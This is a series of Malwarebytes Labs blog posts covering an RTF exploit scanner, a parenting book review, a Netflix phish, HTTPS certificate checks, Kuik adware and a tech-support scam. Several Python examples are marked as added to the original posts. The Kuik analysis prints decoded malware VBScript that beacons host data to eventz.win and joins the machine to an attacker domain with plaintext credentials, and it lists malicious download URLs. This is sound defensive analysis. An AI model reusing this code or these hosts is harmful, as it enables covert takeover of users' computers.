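    r"{\object\objautlink\objupdate\objw1\objh1"
    r"{\*\objdata 0105000002000000" + "00" * 16 + "\n"      # filler bytes, no OLE structure
    + _utf16_hex("http://autosoundcheckers.com/s2/search.php?who=7") + "0000}}}"
)

# Hex payload of each {\*\objdata ...} group (RTF allows whitespace inside the hex run).
OBJDATA_RE = re.compile(r"\\\*\\objdata\s*([0-9a-fA-F\s]+)\}")
# UTF-16LE "http://" or "https://" followed by printable ASCII characters.
UTF16_URL_RE = re.compile(rb"h\x00t\x00t\x00p\x00(?:s\x00)?:\x00/\x00/\x00(?:[\x21-\x7e]\x00)+")

def objdata_blobs(rtf_text):
    """Decode every \\*\\objdata hex payload in the document into bytes."""
    return [bytes.fromhex("".join(h.split())) for h in OBJDATA_RE.findall(rtf_text)]

def embedded_urls(blob):
    """UTF-16LE URLs found anywhere in an object payload."""
    return [m.group().decode("utf-16-le") for m in UTF16_URL_RE.finditer(blob)]

def scan_rtf(rtf_text):
    """Triage verdict: OLE objects present, autolink/auto-update flags, remote URLs."""
    blobs = objdata_blobs(rtf_text)
    urls = [u for blob in blobs for u in embedded_urls(blob)]
    autolink = r"\objautlink" in rtf_text
    return {
        "objects": len(blobs),
        "autolink": autolink,
        "auto_update": r"\objupdate" in rtf_text,   # object is refreshed (fetched) on open
        "remote_urls": urls,
        "suspicious": autolink and bool(urls),
    }

if __name__ == "__main__":
    import json
    print(json.dumps(scan_rtf(SAMPLE_RTF), indent=2))
```

The verdict keys map onto what the post describes: an autolink object that is updated on open and points at a remote server is the combination that fetches the exploit, so a document matching all three is worth detonating in a sandbox rather than opening.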

The post Internet Explorer zero-day: browser is once again under attack appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Parenting in the Digital World: a review

Malwarebytes - Thu, 05/10/2018 - 15:00

Before I became a new mum not so long ago, I did the best I could to prepare myself to take care of my little one by reading a lot of books. From learning how to discern (possible) meanings behind a baby’s various cries to finding out what you can and can’t feed your baby once they begin eating solids. It was tough, and I know it’ll get easier in some aspects and more difficult in others as the baby grows up. Truth is, I’m pretty much looking forward to giving “the Cyber Talk” to my little one. And “the Tech Talk.” And “the Privacy Talk.” Hey, we have to start them young, right?

At the moment, my nipper is too young to care about anything beyond Hey Duggee, so I can only imagine what parenting is like for those who have a child old enough to use a mobile device. Would they set their phone up to limit the child from opening its browser or tell them to not click buttons when certain pop-ups appear in the middle of a game?

To my dismay, Parenting in a Digital World paints the picture that many parents don’t do a great job dealing with kids and technology—especially when it comes to online safety.

While more and more parents are handing over phones to younger and younger kids, I’m surprised that the majority of parents don’t put filtering or any other sort of control on these devices, forgetting that their kids can be exposed to potential risks without knowing how to deal with them. Not only that, “accidentally” losing thousands of dollars to micro-transactions can and actually does happen to parents who don’t supervise their kids online.

Parenting in the Digital World: A Step-by-Step Guide to Internet Safety is a brilliant go-to guide for parents and guardians on how to create an online environment safe enough for their little ones to traverse. In its revised second edition, Clayton Cranford, the book’s author, touched on themes that include social media safety, the importance of privacy, managing an online reputation, and creating balance in a child’s technological life.

Read: Creating a better Internet starts now

Cranford is a leading and award-winning law enforcement professional based in California. For 20 years, he has been teaching about social media and child safety to kids and parents, and threat assessment investigation to law enforcement agencies everywhere in the United States. He has also handled numerous threat assessment cases across about 200 schools in his state.

If you’re the mum or dad who is busy with work or taking care of the second newborn and feeling overwhelmed with the thought of trying to learn about these technologies, Cranford wrote Parenting in the Digital World just for you. In less than 100 pages, you’ll get to know famous apps children use, ways to set up parenting controls for different OSes and gaming consoles, relevant security and privacy topics for conversations with your kids, and setting rules and expectations in the home about proper technology use.

I can name some things I love about Parenting in the Digital World. In the first half of the book, Cranford tells parents and guardians about the different types of social media, what the problems with each platform are, and when it is age-appropriate for kids to have profiles of their own. These sections also contain action plans that grown-ups can use to, say, make sure that the settings of their child’s social media profile are appropriately configured for privacy.

Cranford also sheds light on topics beyond security and privacy that parents can talk to their kids about, such as depression, body image, the consequences of making physical threats online, and even pornography. I was also quite intrigued by the Internet & Mobile Device Usage Contract, which parents can use to foster responsibility for the devices their children use and accountability for what they post online. It’s been a while since I’ve seen something similar, and I’ve always been interested in knowing how useful a working contract would be between parent and child.

The second half of the book contains detailed instructions and illustrations about all things parents may want to configure, from parental controls for the Xbox One to YouTube Safe Search and Apple iMessage Privacy.

While I wouldn’t say “no” to having this book in my personal library, I felt it should have covered other social media risks kids and teens might encounter, such as bad bots (spammers) and trolls, and perhaps a sub-section on how to recognize compromised or fake accounts. I also think it would be helpful for both kids and parents to be given pointers on how they can discern dodgy apps from legitimate ones.

Read: When trolls come in a three-piece suit

Parenting in the Digital World: A Step-by-Step Guide to Internet Safety remains as comprehensive and relevant as it was at its first publication three years ago. Cranford was right: As much as there are new devices, software, and websites, the sad reality is that some things—bad things—remain the same. Online sexual exploitation, cyberbullying, and harassment cannot be fought off if we don’t do something about them. Thankfully, parents and guardians can take action. After all, learning about Internet safety and securing a child’s online environment begins in the home, too.


The post Parenting in the Digital World: a review appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Netflix phish claims your membership is on hold

Malwarebytes - Wed, 05/09/2018 - 17:00

The days of ugly-looking phish pages hosted on something akin to a Geocities page are slowly receding into the distance. For quite some time now, phish attacks have made attempts to look fairly sophisticated and stand a decent chance of fooling anyone not keeping their guard up.

Today, we have a good example of this with a Netflix phish currently in circulation and (potentially) dropping into a mailbox near you. Netflix is a frequent target of all manner of scams, and is a popular go-to for phishers.

Here’s the email that kickstarts the process:

Your Netflix Membership is on hold [#46537]

We recently failed to validate your payment information we hold on record for your account,
therefore we need to ask you to complete a brief validation process in order to verify your billing and payment details.

Click here to verify your account

Failure to complete the validation process will result in a suspension of your netflix membership.

We take every step needed to automatically validate our users, unfortunately in this case we were unable to verify your details.

This process will only take a couple of minutes
and will allow us to maintain our high standard of account security.

Netflix Support Team

This message was mailed automatically by Netflix during routine security checks. We are not completely satisfied with your account information and required you to update your account to continue using our services uniterrupted.


Apart from the clunky typo in the small print, this is a fairly convincing email scam, combining someone who knows how to make an email not look terrible with the imminent threat of losing access. Having said that, you’ll notice the mail system above flagged it as suspicious anyway. This isn’t the case for all email clients, however, and one shouldn’t assume nothing slips through the cracks. The destination site, located at login(dot)netflix-activate(dot)com, appropriates a standard, no-frills Netflix login screen.


You’ll also notice the site makes use of HTTPS in an effort to look more convincing, via a free cert from Let’s Encrypt.

If the days of ugly phish pages are on the wane, so too are the days of advising people to look for HTTPS when working out if a site is trustworthy or not. For comparison, here’s what you see in the address bar for the real Netflix:

That’s really nothing you can base a “this is the real site” judgement on; all you can really do here is say that all communications on both sites are securely encrypted. But that doesn’t mean you’re securely communicating with the right people. You can, of course, click into the padlock area and see more information about the certificate issued, but for most people, that won’t help them make a decision one way or the other.

Many organisations make use of Extended Validation certificates, which display the certificate holder’s name in the padlock area in return for additional auditing to make sure they are who they claim to be. Visit PayPal’s website if you want to see an example of this. There is some criticism of these certs, but in general it’s a useful visual aid.

Anyway, onto the phish itself, which consists of a grab for personal information including name, address, phone number, and date of birth:


After that, they try and swipe payment information, asking for the name as written on the card, card number, expiry date, security code, and even a cheap grab at a security question answer for good measure.


Once everything has been entered into the site, the scammer presents the victim with a splash page claiming everything is now up to date:


It reads as follows:

Your account has been updated.

Thank you for updating and confirming your account information. You may now continue to login and use your account as normal without further interruptions.

After this, there’s nothing left for the scammer to do except gently coax the now phished website visitor to click the button and be directed to the real Netflix website. They’ll likely be blissfully unaware anything is untoward until the scammers try to make fraudulent transactions on their card.

These emails follow a similar format as the Apple phishes in February, and indeed quite a few others going around at the moment (also Apple-centric, so constant service-related vigilance is the order of the day). Phishing emails won’t be going away anytime soon, and the people behind them keep striving to make their fake-outs ever more believable. It’s up to us to do what we can, and consign their sneaky missives to the recycle bin. Your bank account will thank you for it.

The post Netflix phish claims your membership is on hold appeared first on Malwarebytes Labs.

Categories: Techie Feeds

HTTPS: why the green padlock is not enough

Malwarebytes - Wed, 05/09/2018 - 16:30

When goods get sold in large quantities, the price goes down. This might not be the first law of economics, but it’s applicable. An extrapolation of this is that if there are practically no production costs and no raw materials involved, prices of such goods will drop to zero. Usually, they will be offered as free gifts to promote the sale of other, more costly goods.

Something like this has happened to SSL certificates. They are offered for free with web hosting packages by several companies, including those that don’t do a thorough check into the identity of the buyer. Better said: They couldn’t care less who buys the package as long as they pay the bills.

So, while users can now expect to see the green padlock on every site, especially the ones where they make financial transactions, the trust that we can put into the underlying certificates is going down.

Definitions

To clarify what we are talking about, let’s have a look at the definitions of the protocols we are about to discuss.

Hypertext Transfer Protocol Secure (HTTPS) is a variant of the standard web transfer protocol (HTTP) that adds a layer of security to the data in transit through a Secure Sockets Layer (SSL) or Transport Layer Security (TLS) protocol connection.

Secure Sockets Layer (SSL) is a computer networking protocol for securing connections between network application clients and servers over an insecure network, such as the Internet.

Transport Layer Security (TLS) replaced SSL when it was deprecated, but TLS is backwards-compatible with SSL 3.0.

So, basically TLS is a computer networking protocol that provides privacy and data integrity between two communicating applications. It’s used for web browsers and other applications that require data to be securely exchanged over a network.

The green padlock

So, where does the green padlock come into play? The green padlock simply means that traffic to and from the website is encrypted. A certificate, issued by a Certificate Authority (CA), is used to set up this encryption. Sounds good, right? But the only thing you can actually be sure of when you see such a padlock is that your computer is connected to the site that you see in the address bar.

Let’s use the example above to explain some of this. A right-click on the padlock shows us some more information about the secure connection.

So, we have a secure connection to the domain paypal.com owned by PayPal, Inc. and the Certificate Authority is Symantec.

Let us compare this authentic one to the one in use by a known PayPal phishing site:

As you can see, the phishers have a green padlock on their site as well. But when we have a look at the details:

It is easy to see, from the browser address bar alone, that we are not connected to paypal.com. And in the additional information, we can see that the phishers used a free certificate from the CA Let’s Encrypt.

I do realize that in this example it was easy to see the wrong address in the browser’s address bar, but typosquatted domains can be a lot harder to spot, as they purposely use domain names that look similar to the legitimate site. PayPal has registered many such typosquatted domains to protect their customers.

So, we’ve established that the green padlock alone is not enough. In fact, over a million new phishing sites surface every month. Given how many new sites—not just phishing sites—are created every day, and knowing that hosting deals include free certificates and are cheap as dirt, we can easily assume that hosting providers do not have the resources to check each and every new site. Even if they did perform these checks, who is going to check whether the site does not get changed once it has gone live?

So, since the visitor is the one facing the consequences of entering his credentials on a phishing site, it looks like the ball is in his court.

But there is help

You do not need to feel helpless. The cavalry comes to the rescue in many shapes and forms. Some browsers warn you before they let you visit known phishing or other malicious sites. This method is based on blacklisting, so if you are among the first visitors, you could still wind up on such a site without a warning.

Some security software, including Malwarebytes, blocks known phishing and other malicious sites. These methods can be based both on blacklisting and behavioral analysis.

And there are certificates that do get issued only after extended checks. These are called EV (Extended Validation) certificates. To show the difference, we need to double back a bit.

The bottom screenshot is the original PayPal certificate, and it is an extended one. The top screenshot is a regular Domain Validation (DV) certificate (which was used by the phishing site). As you may notice, the EV certificates are displayed differently from the DV certificates. The difference in how they are displayed varies per browser, so you might want to familiarize yourself with the way that these are displayed in your browser of choice.

Check, check, triple-check

Since HTTPS and TLS are becoming commonplace and cheap, phishers are no longer barred in any way from using the green padlock on their deceptive sites. As a consequence, users are advised to pay attention to the kind of certificate behind the padlock.

The best practice is to have shortcuts for the websites that you use to transmit personal or financial data, rather than clicking on links sent to you by mail or found by other means. At first contact, the things to check on a website that requires entering personal information or credentials are the following:

  • Is there a green padlock in the address bar?
  • Does the address in the browser’s address bar match your expectations?
  • Is there an EV certificate or not?

Only when you are satisfied that the website belongs to the domain of the company you intended to visit should you enter your credentials or personal data.
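As an added example (not code from the post), here are the three checks above expressed in Python against certificate summaries in the shape returned by ssl.SSLSocket.getpeercert(). The two certificate dictionaries are constructed: the domain names come from this post and from the Netflix phish post above, while the issuer common names are placeholders. getpeercert() does not expose certificate policies, so the EV check takes the policy OIDs as a separate argument (the CA/Browser Forum EV identifier is 2.23.140.1.1); in practice you would obtain them by parsing the DER certificate with a library such as cryptography. The fetch_peer_cert helper performs the live handshake and is not used by the offline demonstration.

```python
import socket
import ssl

CAB_FORUM_EV_OID = "2.23.140.1.1"   # CA/Browser Forum Extended Validation policy identifier

# Constructed certificate summaries in the shape ssl.SSLSocket.getpeercert() returns.
# Domain names come from this post and the Netflix phish above; issuer CNs are placeholders.
PAYPAL_CERT = {
    "subject": ((("countryName", "US"),), (("organizationName", "PayPal, Inc."),),
                (("commonName", "www.paypal.com"),)),
    "issuer": ((("organizationName", "Symantec"),), (("commonName", "example-ev-issuer"),)),
    "subjectAltName": (("DNS", "www.paypal.com"), ("DNS", "paypal.com")),
}
PHISH_CERT = {
    "subject": ((("commonName", "login.netflix-activate.com"),),),
    "issuer": ((("organizationName", "Let's Encrypt"),), (("commonName", "example-dv-issuer"),)),
    "subjectAltName": (("DNS", "login.netflix-activate.com"),),
}

def _labels(name):
    return name.lower().rstrip(".").split(".")

def hostname_matches(hostname, pattern):
    """RFC 6125-style match against one dNSName. A wildcard counts only as the whole
    leftmost label of a pattern with at least two more labels: '*.paypal.com' is fine,
    '*.com' and 'w*.paypal.com' are not."""
    host, pat = _labels(hostname), _labels(pattern)
    if "*" not in pattern:
        return host == pat
    if pat[0] != "*" or len(pat) < 3 or any("*" in label for label in pat[1:]):
        return False
    return len(host) == len(pat) and host[1:] == pat[1:]

def dns_names(cert):
    """Names the certificate is valid for: SAN dNSName entries, else the subject CN."""
    names = [value for kind, value in cert.get("subjectAltName", ()) if kind == "DNS"]
    return names or [v for rdn in cert.get("subject", ()) for k, v in rdn if k == "commonName"]

def issuer_org(cert):
    """organizationName of the issuing CA, or 'unknown' if the field is absent."""
    return next((v for rdn in cert.get("issuer", ()) for k, v in rdn if k == "organizationName"), "unknown")

def assess_site(expected_domain, hostname, cert, policy_oids=()):
    """The three checks from the post, for a connection that already shows its padlock."""
    expected, host = expected_domain.lower(), hostname.lower()
    return {
        # does the address bar belong to the company you meant to visit?
        "address_matches_expectation": host == expected or host.endswith("." + expected),
        # the padlock's real guarantee: the certificate is valid for the host you are on
        "certificate_matches_hostname": any(hostname_matches(host, p) for p in dns_names(cert)),
        "issuer": issuer_org(cert),
        # EV is only knowable from the certificatePolicies extension, passed in by the caller
        "extended_validation": CAB_FORUM_EV_OID in policy_oids,
    }

def fetch_peer_cert(hostname, port=443):
    """Live variant: perform the TLS handshake (the padlock) and return the peer cert dict."""
    context = ssl.create_default_context()
    with socket.create_connection((hostname, port), timeout=10) as raw:
        with context.wrap_socket(raw, server_hostname=hostname) as tls:
            return tls.getpeercert()

if __name__ == "__main__":
    print("real PayPal:", assess_site("paypal.com", "www.paypal.com", PAYPAL_CERT, [CAB_FORUM_EV_OID]))
    print("phish:", assess_site("netflix.com", "login.netflix-activate.com", PHISH_CERT))
```

The phishing case is the instructive one: the certificate genuinely matches login.netflix-activate.com, so the padlock is green and the encryption is real, yet the address check fails because that host is not under netflix.com. Only the first check, the one a browser cannot do for you, separates the two.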

Stay safe!

The post HTTPS: why the green padlock is not enough appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Kuik: a simple yet annoying piece of adware

Malwarebytes - Tue, 05/08/2018 - 16:00

Some pieces of malware can be so simple—and yet such a pain to get rid of—especially when they start interfering with your system’s configuration. This much is true for the Kuik adware program, which surprised us all by forcing affected machines to join a domain controlled by the attackers.

The perpetrators are using this unusual technique to push Google Chrome extensions and coin miner applications to their victims. In this blog, we’ll provide technical analysis of this adware and custom removal instructions.

Technical description

Stage 1 – .NET installer

0ba20fee958b88c48f3371ec8d8a8e5d

The first stage is written in .NET with an icon imitating the Adobe Flash Player. This is typical of bundlers that promise to update software components but also add their own code to the original installer.

After opening it with a .NET decompiler (e.g. dnSpy), we found that the project’s original name was WWVaper.

It has three resources inside:

  • a certificate (svr.crt)
  • a legitimate Flash (decoy)
  • a next stage component (upp.exe)

The certificate:

-----BEGIN CERTIFICATE-----
MIIEZjCCA06gAwIBAgIJAPywkVD7m/9XMA0GCSqGSIb3DQEBCwUAMHMxCzAJBgNV
BAYTAlVTMQswCQYDVQQIDAJOWTERMA8GA1UEBwwITmV3IFlvcmsxFTATBgNVBAoM
DEV4YW1wbGUsIExMQzEMMAoGA1UEAwwDYWxsMR8wHQYJKoZIhvcNAQkBFhB0ZXN0
QGV4YW1wbGUuY29tMB4XDTE4MDIxNjIyMjA0M1oXDTE5MDIxNjIyMjA0M1owczEL
MAkGA1UEBhMCVVMxCzAJBgNVBAgMAk5ZMREwDwYDVQQHDAhOZXcgWW9yazEVMBMG
A1UECgwMRXhhbXBsZSwgTExDMQwwCgYDVQQDDANhbGwxHzAdBgkqhkiG9w0BCQEW
EHRlc3RAZXhhbXBsZS5jb20wggEiMA0GCSqGSIb3DQEBAQUAA4IBDwAwggEKAoIB
AQDMohZZUrsJOqXS1/eTpGGOMDxEE+YmRLmSU5h/K4tmnkr7Tv9cukICp/Xxnrci
5ONLdqgQFH1xLxLa6Xo+2X075NS0VjfMPx9WvYPSZ/T7uQQhb8Mc+ojjNoHK0JbD
oPjiuiGTLllq1AQ34kvQa6k8E7GPjSdrQnPF55+aWAdPSIDcdqxMt1uFOcF0DY4y
vHNpFw1xsjpYuvw1/MvwITr3A+PdKN9TIMzDgbXTZEtc7rWDah4HtIYSJZ2xwIcH
qp6xU9FypSV6JnbITlv4gZkUuI2HeiNpSGGd55KOtk5pDhuGeNfLGor6eWcSG6eX
N6erGBkM7VTfJ5yM9Pxfcu+hAgMBAAGjgfwwgfkwHQYDVR0OBBYEFCZDbmCp6xnU
3F/U3InMEiuduPEMMB8GA1UdIwQYMBaAFCZDbmCp6xnU3F/U3InMEiuduPEMMAkG
A1UdEwQCMAAwCwYDVR0PBAQDAgWgMHEGA1UdEQRqMGiCCXlhaG9vLmNvbYINd3d3
LnlhaG9vLmNvbYIKZ29vZ2xlLmNvbYIOd3d3Lmdvb2dsZS5jb22CCWdvb2dsZS5t
ZYINd3d3Lmdvb2dsZS5tZYIIYmluZy5jb22CDHd3dy5iaW5nLmNvbTAsBglghkgB
hvhCAQ0EHxYdT3BlblNTTCBHZW5lcmF0ZWQgQ2VydGlmaWNhdGUwDQYJKoZIhvcN
AQELBQADggEBAMQm1OHLdcYvQK6aMPgYdOozkDT20DuJ6NZD1Frljjex7NzB7nVm
AC+3h1huSyqxYGbJQ8J3wLOYRZH+N5GOZUvjwrU+NY5KurWbMj6USMfsWfnnSXQi
0ADyjYZqtPMmIaIK86yPx4t+3mA8VX5nDRurjKoprTKwaQpxKksZ0kkpitN1epZX
2g1YJAnjnq/9Ilt3MOCEpoCnUz5E+bgQO9AS9ZQqNryuGFfzjgXxLbYBbyDVknZ0
2zz4Zzkm2QBCIGi5jigz7VmwmcpIhJPH9QKlCw5Dx+F3mepR01UMaiwEBDGIeSWX
+joBVMKdqhFu9zChlN0dW0hbViIm+gDYsCQ=
-----END CERTIFICATE-----

Details of the certificate:

The certificate points to a DNS name of yahoo.com. However, the certification path is invalid:

The .NET installer is responsible for installing the malicious certificate and other components. First, it enumerates the network interfaces and adds collected IPs to the list:

Then, it adds a new DNS server address (18.219.162.248) to the collected interfaces. It also installs its own certificate (svr.crt):
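The certificate details shown in the screenshots above (the DNS names it claims and the invalid certification path) can be recovered from the PEM itself. The following is an added example, not code from the post or from Malwarebytes: a minimal DER walker using only the Python standard library that parses the svr.crt PEM quoted above and reports the issuer and subject common names, the validity window, the subjectAltName entries, and whether the certificate is self-signed (issuer byte-identical to subject), which is why the path cannot be validated. It assumes a v3 certificate carrying a subjectAltName extension and parses nothing beyond the fields it reports.

```python
import base64
from datetime import datetime

# svr.crt as dropped by the Kuik installer: the PEM quoted in the post above, verbatim.
KUIK_CERT_PEM = """-----BEGIN CERTIFICATE-----
MIIEZjCCA06gAwIBAgIJAPywkVD7m/9XMA0GCSqGSIb3DQEBCwUAMHMxCzAJBgNV
BAYTAlVTMQswCQYDVQQIDAJOWTERMA8GA1UEBwwITmV3IFlvcmsxFTATBgNVBAoM
DEV4YW1wbGUsIExMQzEMMAoGA1UEAwwDYWxsMR8wHQYJKoZIhvcNAQkBFhB0ZXN0
QGV4YW1wbGUuY29tMB4XDTE4MDIxNjIyMjA0M1oXDTE5MDIxNjIyMjA0M1owczEL
MAkGA1UEBhMCVVMxCzAJBgNVBAgMAk5ZMREwDwYDVQQHDAhOZXcgWW9yazEVMBMG
A1UECgwMRXhhbXBsZSwgTExDMQwwCgYDVQQDDANhbGwxHzAdBgkqhkiG9w0BCQEW
EHRlc3RAZXhhbXBsZS5jb20wggEiMA0GCSqGSIb3DQEBAQUAA4IBDwAwggEKAoIB
AQDMohZZUrsJOqXS1/eTpGGOMDxEE+YmRLmSU5h/K4tmnkr7Tv9cukICp/Xxnrci
5ONLdqgQFH1xLxLa6Xo+2X075NS0VjfMPx9WvYPSZ/T7uQQhb8Mc+ojjNoHK0JbD
oPjiuiGTLllq1AQ34kvQa6k8E7GPjSdrQnPF55+aWAdPSIDcdqxMt1uFOcF0DY4y
vHNpFw1xsjpYuvw1/MvwITr3A+PdKN9TIMzDgbXTZEtc7rWDah4HtIYSJZ2xwIcH
qp6xU9FypSV6JnbITlv4gZkUuI2HeiNpSGGd55KOtk5pDhuGeNfLGor6eWcSG6eX
N6erGBkM7VTfJ5yM9Pxfcu+hAgMBAAGjgfwwgfkwHQYDVR0OBBYEFCZDbmCp6xnU
3F/U3InMEiuduPEMMB8GA1UdIwQYMBaAFCZDbmCp6xnU3F/U3InMEiuduPEMMAkG
A1UdEwQCMAAwCwYDVR0PBAQDAgWgMHEGA1UdEQRqMGiCCXlhaG9vLmNvbYINd3d3
LnlhaG9vLmNvbYIKZ29vZ2xlLmNvbYIOd3d3Lmdvb2dsZS5jb22CCWdvb2dsZS5t
ZYINd3d3Lmdvb2dsZS5tZYIIYmluZy5jb22CDHd3dy5iaW5nLmNvbTAsBglghkgB
hvhCAQ0EHxYdT3BlblNTTCBHZW5lcmF0ZWQgQ2VydGlmaWNhdGUwDQYJKoZIhvcN
AQELBQADggEBAMQm1OHLdcYvQK6aMPgYdOozkDT20DuJ6NZD1Frljjex7NzB7nVm
AC+3h1huSyqxYGbJQ8J3wLOYRZH+N5GOZUvjwrU+NY5KurWbMj6USMfsWfnnSXQi
0ADyjYZqtPMmIaIK86yPx4t+3mA8VX5nDRurjKoprTKwaQpxKksZ0kkpitN1epZX
2g1YJAnjnq/9Ilt3MOCEpoCnUz5E+bgQO9AS9ZQqNryuGFfzjgXxLbYBbyDVknZ0
2zz4Zzkm2QBCIGi5jigz7VmwmcpIhJPH9QKlCw5Dx+F3mepR01UMaiwEBDGIeSWX
+joBVMKdqhFu9zChlN0dW0hbViIm+gDYsCQ=
-----END CERTIFICATE-----"""

OID_COMMON_NAME = bytes.fromhex("550403")       # 2.5.4.3
OID_SUBJECT_ALT_NAME = bytes.fromhex("551d11")  # 2.5.29.17

def pem_to_der(pem):
    body = "".join(l for l in pem.strip().splitlines() if not l.startswith("-----"))
    return base64.b64decode(body)

def read_tlv(data, pos=0):
    """Decode one DER tag-length-value element; returns (tag, value, next_pos)."""
    tag, length, pos = data[pos], data[pos + 1], pos + 2
    if length & 0x80:                               # long form: next n bytes carry the length
        n = length & 0x7F
        length, pos = int.from_bytes(data[pos:pos + n], "big"), pos + n
    return tag, data[pos:pos + length], pos + length

def children(value):
    """Child (tag, value) pairs of a constructed element's contents."""
    out, pos = [], 0
    while pos < len(value):
        tag, val, pos = read_tlv(value, pos)
        out.append((tag, val))
    return out

def name_attribute(name_der, oid):
    """One attribute (e.g. CN) of an X.501 Name: SEQUENCE OF SET OF SEQUENCE { OID, value }."""
    for _, rdn in children(name_der):
        for _, attr in children(rdn):
            (_, attr_oid), (_, attr_val) = children(attr)
            if attr_oid == oid:
                return attr_val.decode("utf-8", "replace")
    return None

def san_dns_names(extensions_der):
    """dNSName entries (GeneralName tag [2] = 0x82) of subjectAltName, or [] if absent."""
    for _, ext in children(extensions_der):
        parts = children(ext)                       # OID, optional BOOLEAN critical, OCTET STRING
        if parts[0][1] == OID_SUBJECT_ALT_NAME:
            (_, names), = children(parts[-1][1])    # the OCTET STRING wraps a SEQUENCE
            return [v.decode("ascii") for t, v in children(names) if t == 0x82]
    return []

def inspect_certificate(pem):
    """Issuer/subject CN, validity, SANs and a self-signed flag for one X.509 certificate."""
    (_, tbs), _sig_alg, _sig = children(read_tlv(pem_to_der(pem))[1])
    fields = children(tbs)
    if fields[0][0] == 0xA0:                        # explicit [0] version, present in v3 certs
        fields = fields[1:]
    _serial, _alg, (_, issuer), (_, validity), (_, subject) = fields[:5]
    (_, ext_seq), = children(next(v for t, v in fields[5:] if t == 0xA3))   # [3] extensions
    nb, na = [datetime.strptime(v.decode(), "%y%m%d%H%M%SZ") for _, v in children(validity)]
    return {
        "issuer_cn": name_attribute(issuer, OID_COMMON_NAME),
        "subject_cn": name_attribute(subject, OID_COMMON_NAME),
        "self_signed": issuer == subject,           # identical Name encodings: no chain at all
        "not_before": nb.isoformat(), "not_after": na.isoformat(),
        "san": san_dns_names(ext_seq),
    }

def findings(info):
    """Reasons a defender should distrust this certificate."""
    out = ["self-signed: issuer equals subject, so there is no path to a trusted root"] if info["self_signed"] else []
    if info["self_signed"] and info["san"]:
        out.append("self-signed certificate claims third-party hostnames: " + ", ".join(info["san"]))
    return out

if __name__ == "__main__":
    info = inspect_certificate(KUIK_CERT_PEM)
    print(info, *findings(info), sep="\n")
```

Run against the PEM above, the walker reports CN=all for both issuer and subject, a one-year validity starting 2018-02-16, and eight SAN entries covering yahoo.com, google.com, google.me and bing.com with their www variants: a self-signed certificate for search-engine hostnames, installed alongside a rogue DNS server, is the combination that lets the adware interpose itself on those sites without certificate warnings.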

Stage 2 – upp.exe

3a13b73f823f081bcdc57ea8cc3140ac

This application is an installer bundle that is not obfuscated. Inside, we found a cabinet file:

It contains other modules to be dropped:

The application “install.exe” is deployed with the “setup.bat” as a parameter.

Stage 3 – unpacked components from the cabinet

The application install.exe is basic. Its only role is to run the next process in elevated mode. Below, you can see its main function:

The script setup.bat deploys another component named SqadU9FBEV.bat:

It delays execution by pinging 127.0.0.1. Then, it runs the second encoded script, giving it a campaign ID as a parameter:

The next element deployed is an encoded VBS script:

After decoding it (with this decoder), we saw the script in the clear: NYkjVVXepl.vbs. We also saw that it fingerprints the system and beacons to a server:

Set SystemSet = GetObject("winmgmts:").InstancesOf ("Win32_OperatingSystem")
for each System in SystemSet
    winVer = System.Caption
next

Function trackEvent(eventName, extraData)
    Set tracking = CreateObject("MSXML2.XMLHTTP")
    tracking.open "GET", "http://eventz.win:13463/trk?event=" & eventName & "&computer=" & UUID & "&windows-version=" & winVer & "&error=" & err.Number & ";" & err.Description & ";" & err.Source & ";" & extraData & "&campaign=qavriknzkk&channel=" & WScript.Arguments.Item(0), False
    tracking.send
    err.clear
End Function

The interesting fragment is about adding the infected computer to a domain:

SET objNetwork = CREATEOBJECT("WScript.Network")
strComputer = objNetwork.ComputerName
SET objComputer = GetObject("winmgmts:" & "{impersonationLevel=Impersonate,authenticationLevel=Pkt}!\\" & strComputer & "\root\cimv2:Win32_ComputerSystem.Name='" & strComputer & "'")
ReturnValue = objComputer.JoinDomainOrWorkGroup("kuikdelivery.com", "4sdOwt7b7L1vAKR6U7", "kuikdelivery.com\administrator", "OU=" & WScript.Arguments.Item(0) & ",DC=kuikdelivery,DC=com", JOIN_DOMAIN + ACCT_CREATE + DOMAIN_JOIN_IF_JOINED + JOIN_UNSECURE)
If (ReturnValue <> 0) Or (err.number <> 0) Then
    trackEvent "join-domain-failed", ReturnValue
    WScript.Quit 1
Else
    trackEvent "join-domain-success", Null
    WScript.Quit 0
End If

Payloads

There is a range of payloads used by this program, but bogus Chrome extensions seem to be a particular favorite. In addition, some coin miners are being served:

Removal

Malwarebytes users (version 3.x) can remove this threat from their system by running a full scan. The removal includes unjoining the malicious domain controller to restore your machine to its original state.

Indicators of compromise

Kuik

b9323268bf81778329b8316dec8f093fe71104f16921a1c9358f7ba69dd52686
990c019319fc18dca473ac432cdf4c36944b0bce1a447e85ace819300903a79e

Chrome extensions

d-and-h[.]com/fljlngkbcebmlpdlojnndahifaocnipb.crx
d-and-h[.]com/123.crx
d-and-h[.]com/jpfhjoeaokamkacafjdjbjllgkfkakca.crx
d-and-h[.]com/mmemdlochnielijcfpmgiffgkpehgimj.crx
kuikdelivery[.]com/emhifpfmcmoghejbfcbnknjjpifkmddc.crx
tripan[.]me/kdobijehckphahlmkohehaciojbpmdbp.crx

Payloads

92996D9E7275006AB6E59CF4676ACBB2B4C0E0DF59011347CE207B219CB2B751
33D86ABF26EFCDBD673DA5448C958863F384F4E3E678057D6FAB735968501268
7889CB16DB3922BEEFB7310B832AE0EF60736843F4AD9FB2BFE9D8B05E48BECD
761D62A22AE73307C679B096030BF0EEC93555E13DC820931519183CAA9F1B2A
871AD057247C023F68768724EBF23D00EF842F0B510A3ACE544A8948AE775712

The post Kuik: a simple yet annoying piece of adware appeared first on Malwarebytes Labs.


Shoppers Stop tech scam draws from thousands of forced ad injections

Malwarebytes - Tue, 05/08/2018 - 13:25

These days, there are a lot of browser locker campaigns fueled by malvertising or redirection from hacked sites. But the Shoppers Stop tech scam campaign is actually a bit of both, using compromised sites injected with advertising code that redirects users to other threats, including tech support scams, via malvertising.

We believe those ad injections came from pirated CMS themes. Normally, these are WordPress themes that people typically have to pay to download. Instead, they are offered for free, with a bonus bundle of malicious code.

One aspect we noticed as part of the redirection mechanism was an online shopping portal registered to domains with suspicious TLDs such as .trade, .accountant, .ml that quickly rotate to make blacklisting approaches futile. However, using that same artifact, we were able to flag other browser locker incidents for this particular campaign.

The browlock

The browser locker used in this campaign is a spin-off of the Google Chrome Safe Browsing warning. The scammers have added scare tactics to it (e.g. Hard Drive Safety Delete Starting in: 5:00 minutes), as well as authentication pop-ups that prevent the user from closing the browser tab or window.

